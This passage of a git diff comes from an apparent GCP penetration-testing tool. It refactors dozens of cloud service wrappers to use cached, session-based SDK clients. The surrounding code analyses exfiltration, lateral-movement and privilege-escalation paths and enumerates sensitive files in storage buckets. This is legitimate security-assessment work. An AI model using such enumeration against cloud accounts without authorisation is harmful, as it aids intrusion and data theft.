Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { iamService = nil } @@ -494,13 +514,7 @@ func (s *AttackPathService) AnalyzeResourceAttackPaths(ctx context.Context, proj exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) // Get IAM service for role resolution - var iamService *iam.Service - var err error - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err := s.getIAMService(ctx) if err != nil { iamService = nil } @@ -528,13 +542,7 @@ func (s *AttackPathService) AnalyzeResourceAttackPaths(ctx context.Context, proj func (s *AttackPathService) analyzeBucketIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { var paths []AttackPath - var storageService *storage.Service - var err error - if s.session != nil { - storageService, err = storage.NewService(ctx, s.session.GetClientOption()) - } else { - storageService, err = storage.NewService(ctx) - } + storageService, err := s.getStorageService(ctx) if err != nil { return paths } @@ -572,13 +580,7 @@ func (s *AttackPathService) analyzeBucketIAM(ctx context.Context, projectID, pat func (s *AttackPathService) analyzeBigQueryIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { var paths []AttackPath - var bqService *bigquery.Service - var err error - if s.session != nil { - bqService, err = bigquery.NewService(ctx, s.session.GetClientOption()) - } else { - bqService, err = bigquery.NewService(ctx) - } + bqService, err := s.getBigQueryService(ctx) if err != nil { return paths } @@ -636,11 +638,7 @@ func (s *AttackPathService) analyzeServiceAccountIAM(ctx context.Context, projec if iamService == nil { var err error - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } + iamService, err = s.getIAMService(ctx) if err != nil { return paths } @@ -679,13 +677,7 @@ func (s *AttackPathService) analyzeServiceAccountIAM(ctx context.Context, projec func (s *AttackPathService) analyzeComputeResourceIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { var paths []AttackPath - var computeService *compute.Service - var err error - if s.session != nil { - computeService, err = compute.NewService(ctx, s.session.GetClientOption()) - } else { - computeService, err = compute.NewService(ctx) - } + computeService, err := s.getComputeService(ctx) if err != nil { return paths } diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go index c1255654..599520da 100644 --- a/gcp/services/beyondcorpService/beyondcorpService.go +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" beyondcorp "google.golang.org/api/beyondcorp/v1" ) @@ -21,6 +22,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { return &BeyondCorpService{session: session} } +// getService returns a BeyondCorp service client using cached session if available +func (s *BeyondCorpService) getService(ctx context.Context) (*beyondcorp.Service, error) { + if s.session != nil { + return sdk.CachedGetBeyondCorpService(ctx, s.session) + } + return beyondcorp.NewService(ctx) +} + // IAMBinding represents an IAM binding type IAMBinding struct { Role string `json:"role"` @@ -64,14 +73,8 @@ type AppConnectionInfo struct { // ListAppConnectors retrieves all BeyondCorp app connectors func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { ctx := context.Background() - var service *beyondcorp.Service - var err error - if s.session != nil { - service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = beyondcorp.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } @@ -116,14 +119,8 @@ func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorI // ListAppConnections retrieves all BeyondCorp app connections func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { ctx := context.Background() - var service *beyondcorp.Service - var err error - if s.session != nil { - service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = beyondcorp.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 8b2db6d8..197b7026 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -8,6 +8,7 @@ import ( "cloud.google.com/go/bigquery" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" bqapi "google.golang.org/api/bigquery/v2" ) @@ -119,6 +120,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { return &BigQueryService{session: session} } +// getService returns a BigQuery REST API service client using cached session if available +func (bq *BigQueryService) getService(ctx context.Context) (*bqapi.Service, error) { + if bq.session != nil { + return sdk.CachedGetBigQueryService(ctx, bq.session) + } + return bqapi.NewService(ctx) +} + // gcloud alpha bq datasets list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -314,13 +323,8 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ } defer client.Close() - // Create API service for IAM calls - var apiService *bqapi.Service - if bq.session != nil { - apiService, err = bqapi.NewService(ctx, bq.session.GetClientOption()) - } else { - apiService, err = bqapi.NewService(ctx) - } + // Create API service for IAM calls using cached wrapper + apiService, err := bq.getService(ctx) if err != nil { // Continue without IAM if service creation fails apiService = nil diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go index 6bd4e6fe..fd7897bd 100644 --- a/gcp/services/bigtableService/bigtableService.go +++ b/gcp/services/bigtableService/bigtableService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" bigtableadmin "google.golang.org/api/bigtableadmin/v2" ) @@ -17,6 +18,12 @@ func New() *BigtableService { return &BigtableService{} } +func NewWithSession(session *gcpinternal.SafeSession) *BigtableService { + return &BigtableService{ + session: session, + } +} + type BigtableInstanceInfo struct { Name string `json:"name"` FullName string `json:"fullName"` @@ -55,9 +62,17 @@ type BigtableResult struct { Tables []BigtableTableInfo } +// getService returns a Bigtable Admin service client using cached session if available +func (s *BigtableService) getService(ctx context.Context) (*bigtableadmin.Service, error) { + if s.session != nil { + return sdk.CachedGetBigtableAdminService(ctx, s.session) + } + return bigtableadmin.NewService(ctx) +} + func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { ctx := context.Background() - service, err := bigtableadmin.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") } diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index 782c8924..692914da 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -7,6 +7,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" "google.golang.org/api/storage/v1" ) @@ -23,6 +24,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { return &BucketEnumService{session: session} } +// getStorageService returns a Storage service client using cached session if available +func (s *BucketEnumService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + // SensitiveFileInfo represents a potentially sensitive file in a bucket type SensitiveFileInfo struct { BucketName string `json:"bucketName"` @@ -121,14 +130,8 @@ func GetSensitivePatterns() []SensitivePattern { // EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { ctx := context.Background() - var storageService *storage.Service - var err error - if s.session != nil { - storageService, err = storage.NewService(ctx, s.session.GetClientOption()) - } else { - storageService, err = storage.NewService(ctx) - } + storageService, err := s.getStorageService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } @@ -285,14 +288,8 @@ type ObjectInfo struct { // EnumerateAllBucketObjects lists ALL objects in a bucket (no filtering) func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID string, maxObjects int) ([]ObjectInfo, error) { ctx := context.Background() - var storageService *storage.Service - var err error - if s.session != nil { - storageService, err = storage.NewService(ctx, s.session.GetClientOption()) - } else { - storageService, err = storage.NewService(ctx) - } + storageService, err := s.getStorageService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } @@ -337,14 +334,8 @@ func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID stri // GetBucketsList lists all buckets in a project func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { ctx := context.Background() - var storageService *storage.Service - var err error - if s.session != nil { - storageService, err = storage.NewService(ctx, s.session.GetClientOption()) - } else { - storageService, err = storage.NewService(ctx) - } + storageService, err := s.getStorageService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go index 0286aa00..4ae022e8 100644 --- a/gcp/services/certManagerService/certManagerService.go +++ b/gcp/services/certManagerService/certManagerService.go @@ -7,16 +7,25 @@ import ( "time" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" certificatemanager "google.golang.org/api/certificatemanager/v1" compute "google.golang.org/api/compute/v1" ) -type CertManagerService struct{} +type CertManagerService struct { + session *gcpinternal.SafeSession +} func New() *CertManagerService { return &CertManagerService{} } +func NewWithSession(session *gcpinternal.SafeSession) *CertManagerService { + return &CertManagerService{ + session: session, + } +} + // Certificate represents an SSL/TLS certificate type Certificate struct { Name string `json:"name"` @@ -57,10 +66,26 @@ type CertificateMap struct { Certificates []string `json:"certificates"` } +// getCertManagerService returns a Certificate Manager service client using cached session if available +func (s *CertManagerService) getCertManagerService(ctx context.Context) (*certificatemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetCertificateManagerService(ctx, s.session) + } + return certificatemanager.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (s *CertManagerService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + // GetCertificates retrieves Certificate Manager certificates func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { ctx := context.Background() - service, err := certificatemanager.NewService(ctx) + service, err := s.getCertManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") } @@ -124,7 +149,7 @@ func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, e // GetSSLCertificates retrieves classic Compute Engine SSL certificates func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getComputeService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -222,7 +247,7 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific // GetCertificateMaps retrieves certificate maps func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { ctx := context.Background() - service, err := certificatemanager.NewService(ctx) + service, err := s.getCertManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") } diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go index 473d8fc9..09f58bb4 100644 --- a/gcp/services/cloudArmorService/cloudArmorService.go +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -6,15 +6,24 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" compute "google.golang.org/api/compute/v1" ) -type CloudArmorService struct{} +type CloudArmorService struct{ + session *gcpinternal.SafeSession +} func New() *CloudArmorService { return &CloudArmorService{} } +func NewWithSession(session *gcpinternal.SafeSession) *CloudArmorService { + return &CloudArmorService{ + session: session, + } +} + // SecurityPolicy represents a Cloud Armor security policy type SecurityPolicy struct { Name string `json:"name"` @@ -46,10 +55,18 @@ type RateLimitInfo struct { ExceedAction string `json:"exceedAction"` } +// getService returns a Compute service client using cached session if available +func (s *CloudArmorService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + // GetSecurityPolicies retrieves all Cloud Armor security policies func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } @@ -221,7 +238,7 @@ func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { // GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { ctx := context.Background() - service, err := compute.NewService(ctx) + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index e62fa8df..a6511719 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -9,17 +9,16 @@ import ( "cloud.google.com/go/iam" "cloud.google.com/go/storage" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" - "google.golang.org/api/option" storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - client *storage.Client session *gcpinternal.SafeSession } -// New creates a new CloudStorageService (legacy - uses ADC directly) +// New creates a new CloudStorageService (requires session for SDK caching) func New() *CloudStorageService { return &CloudStorageService{} } @@ -29,11 +28,6 @@ func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { return &CloudStorageService{session: session} } -// NewWithClient creates a CloudStorageService with an existing client (for reuse) -func NewWithClient(client *storage.Client) *CloudStorageService { - return &CloudStorageService{client: client} -} - // IAMBinding represents a single IAM binding on a bucket type IAMBinding struct { Role string `json:"role"` @@ -42,17 +36,17 @@ type IAMBinding struct { // LifecycleRule represents a single lifecycle rule on a bucket type LifecycleRule struct { - Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload - StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) - AgeDays int64 `json:"ageDays"` // Age condition in days - NumVersions int64 `json:"numVersions"` // Number of newer versions condition - IsLive *bool `json:"isLive"` // Whether object is live (vs archived) - MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match - MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match - MatchesStorage string `json:"matchesStorage"` // Storage class match - CreatedBefore string `json:"createdBefore"` // Created before date condition - DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time - DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent } // BucketInfo contains bucket metadata and security-relevant configuration @@ -82,14 +76,14 @@ type BucketInfo struct { AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass // Lifecycle configuration - LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules - LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules - LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules - HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule - HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule - ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days - TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) - LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" // Public access indicators IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers @@ -106,14 +100,11 @@ type BucketInfo struct { func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - // Get or create client - client, closeClient, err := cs.getClient(ctx) + // Get cached client from SDK + client, err := cs.getClient(ctx) if err != nil { return nil, err } - if closeClient { - defer client.Close() - } var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -186,37 +177,22 @@ func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { return buckets, nil } -// getClient returns a storage client, using session if available -// Returns the client, whether to close it, and any error -func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, bool, error) { - // If we have an existing client, use it - if cs.client != nil { - return cs.client, false, nil - } - - // If we have a session, use its token source +// getClient returns a cached storage client from SDK +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, error) { if cs.session != nil { - client, err := storage.NewClient(ctx, cs.session.GetClientOption()) - if err != nil { - return nil, false, fmt.Errorf("failed to create client with session: %v", err) - } - return client, true, nil + return sdk.CachedGetStorageClient(ctx, cs.session) } - - // Fall back to ADC - client, err := storage.NewClient(ctx) - if err != nil { - return nil, false, fmt.Errorf("failed to create client: %v", err) - } - return client, true, nil + // Fallback to direct creation for legacy usage (no caching) + return storage.NewClient(ctx) } -// getClientOption returns the appropriate client option based on session -func (cs *CloudStorageService) getClientOption() option.ClientOption { +// getStorageService returns a cached storage REST API service from SDK +func (cs *CloudStorageService) getStorageService(ctx context.Context) (*storageapi.Service, error) { if cs.session != nil { - return cs.session.GetClientOption() + return sdk.CachedGetStorageService(ctx, cs.session) } - return nil + // Fallback to direct creation for legacy usage (no caching) + return storageapi.NewService(ctx) } // getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access @@ -274,13 +250,10 @@ func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *s func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { ctx := context.Background() - client, closeClient, err := cs.getClient(ctx) + client, err := cs.getClient(ctx) if err != nil { return nil, err } - if closeClient { - defer client.Close() - } bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) return bindings, nil @@ -323,16 +296,7 @@ func FormatIAMBindingsShort(bindings []IAMBinding) string { // enrichBucketFromRestAPI fetches additional bucket fields via the REST API // that may not be available in the Go SDK version func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { - var service *storageapi.Service - var err error - - // Use session if available - if cs.session != nil { - service, err = storageapi.NewService(ctx, cs.session.GetClientOption()) - } else { - service, err = storageapi.NewService(ctx) - } - + service, err := cs.getStorageService(ctx) if err != nil { // Silently fail - these are optional enrichments return diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go index 784357b0..87309ae6 100644 --- a/gcp/services/cloudbuildService/cloudbuildService.go +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -5,6 +5,7 @@ import ( "fmt" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" cloudbuild "google.golang.org/api/cloudbuild/v1" ) @@ -22,6 +23,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { return &CloudBuildService{session: session} } +// getService returns a Cloud Build service client using cached session if available +func (s *CloudBuildService) getService(ctx context.Context) (*cloudbuild.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudBuildService(ctx, s.session) + } + return cloudbuild.NewService(ctx) +} + // TriggerInfo represents a Cloud Build trigger type TriggerInfo struct { ID string `json:"id"` @@ -92,14 +101,8 @@ type TriggerSecurityAnalysis struct { // ListTriggers retrieves all Cloud Build triggers in a project func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { ctx := context.Background() - var service *cloudbuild.Service - var err error - if s.session != nil { - service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = cloudbuild.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } @@ -136,14 +139,8 @@ func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error // ListBuilds retrieves recent Cloud Build executions func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { ctx := context.Background() - var service *cloudbuild.Service - var err error - if s.session != nil { - service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = cloudbuild.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index fbdd46b3..3db15a63 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -7,15 +7,31 @@ import ( "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" run "google.golang.org/api/run/v2" ) -type CloudRunService struct{} +type CloudRunService struct{ + session *gcpinternal.SafeSession +} func New() *CloudRunService { return &CloudRunService{} } +func NewWithSession(session *gcpinternal.SafeSession) *CloudRunService { + return &CloudRunService{ + session: session, + } +} + +func (crs *CloudRunService) getServiceV2(ctx context.Context) (*run.Service, error) { + if crs.session != nil { + return sdk.CachedGetCloudRunServiceV2(ctx, crs.session) + } + return run.NewService(ctx) +} + // ServiceInfo holds Cloud Run service details with security-relevant information type ServiceInfo struct { // Basic info @@ -126,7 +142,7 @@ type JobInfo struct { func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { ctx := context.Background() - service, err := run.NewService(ctx) + service, err := cs.getServiceV2(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } @@ -183,7 +199,7 @@ var cloudRunRegions = []string{ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { ctx := context.Background() - service, err := run.NewService(ctx) + service, err := cs.getServiceV2(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go index ea6b6cdc..59004994 100644 --- a/gcp/services/cloudsqlService/cloudsqlService.go +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -6,15 +6,30 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" sqladmin "google.golang.org/api/sqladmin/v1" ) -type CloudSQLService struct{} +type CloudSQLService struct{ + session *gcpinternal.SafeSession +} func New() *CloudSQLService { return &CloudSQLService{} } +func NewWithSession(session *gcpinternal.SafeSession) *CloudSQLService { + return &CloudSQLService{session: session} +} + +// getService returns a SQL Admin service, either cached from the session or a new one +func (cs *CloudSQLService) getService(ctx context.Context) (*sqladmin.Service, error) { + if cs.session != nil { + return sdk.CachedGetSQLAdminService(ctx, cs.session) + } + return sqladmin.NewService(ctx) +} + // SQLInstanceInfo holds Cloud SQL instance details with security-relevant information type SQLInstanceInfo struct { // Basic info @@ -75,7 +90,7 @@ type AuthorizedNetwork struct { func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { ctx := context.Background() - service, err := sqladmin.NewService(ctx) + service, err := cs.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") } diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index 379c2a76..b89a422c 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -7,6 +7,7 @@ import ( "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" composer "google.golang.org/api/composer/v1" ) @@ -44,6 +45,14 @@ func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { return &ComposerService{session: session} } +// getService returns a Composer service client using cached session if available +func (s *ComposerService) getService(ctx context.Context) (*composer.Service, error) { + if s.session != nil { + return sdk.CachedGetComposerService(ctx, s.session) + } + return composer.NewService(ctx) +} + // EnvironmentInfo represents a Cloud Composer environment type EnvironmentInfo struct { Name string `json:"name"` @@ -79,14 +88,8 @@ type EnvironmentInfo struct { // so we must iterate through regions explicitly func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { ctx := context.Background() - var service *composer.Service - var err error - if s.session != nil { - service, err = composer.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = composer.NewService(ctx) - } + service, err := s.getService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") } diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index efa3fada..67ce9ad4 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -6,6 +6,7 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) @@ -121,7 +122,7 @@ type InstanceIAMInfo struct { // getService returns a compute service, using session if available func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { if ces.session != nil { - return compute.NewService(ctx, ces.session.GetClientOption()) + return sdk.CachedGetComputeService(ctx, ces.session) } return compute.NewService(ctx) } diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go index 31f638c1..54e6e411 100644 --- a/gcp/services/crossProjectService/crossProjectService.go +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -6,18 +6,59 @@ import ( "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" logging "google.golang.org/api/logging/v2" pubsub "google.golang.org/api/pubsub/v1" ) -type CrossProjectService struct{} +type CrossProjectService struct { + session *gcpinternal.SafeSession +} func New() *CrossProjectService { return &CrossProjectService{} } +func NewWithSession(session *gcpinternal.SafeSession) *CrossProjectService { + return &CrossProjectService{ + session: session, + } +} + +// getResourceManagerService returns a Resource Manager service using cached session if available +func (s *CrossProjectService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return cloudresourcemanager.NewService(ctx) +} + +// getIAMService returns an IAM service using cached session if available +func (s *CrossProjectService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getLoggingService returns a Logging service using cached session if available +func (s *CrossProjectService) getLoggingService(ctx context.Context) (*logging.Service, error) { + if s.session != nil { + return sdk.CachedGetLoggingService(ctx, s.session) + } + return logging.NewService(ctx) +} + +// getPubSubService returns a PubSub service using cached session if available +func (s *CrossProjectService) getPubSubService(ctx context.Context) (*pubsub.Service, error) { + if s.session != nil { + return sdk.CachedGetPubSubService(ctx, s.session) + } + return pubsub.NewService(ctx) +} + // CrossProjectBinding represents a cross-project IAM binding type CrossProjectBinding struct { SourceProject string `json:"sourceProject"` // Where the principal is from @@ -79,7 +120,7 @@ type CrossProjectPubSubExport struct { func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([]CrossProjectBinding, error) { ctx := context.Background() - crmService, err := cloudresourcemanager.NewService(ctx) + crmService, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } @@ -134,12 +175,12 @@ func (s *CrossProjectService) 